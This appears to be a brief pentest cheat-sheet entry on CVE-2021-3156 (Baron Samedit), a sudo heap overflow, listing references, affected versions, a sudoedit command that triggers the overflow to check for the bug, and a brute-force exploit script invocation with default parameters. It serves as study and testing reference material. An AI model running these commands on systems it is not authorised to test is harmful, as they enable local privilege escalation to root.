killchain-compendium/exploit/linux/sudo/baron_samedit.md

CVE-2021-3156 Baron Samedit

• Animesh Jain's blog post on Qualys
• blasty's PoC
• Heap based overflow
• Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
• Check vulnerability via

sudoedit -s '\' $(python -c "print('\x41' * 10000)")

• Defaults to try

./brute.sh 90 120 50 70 150 300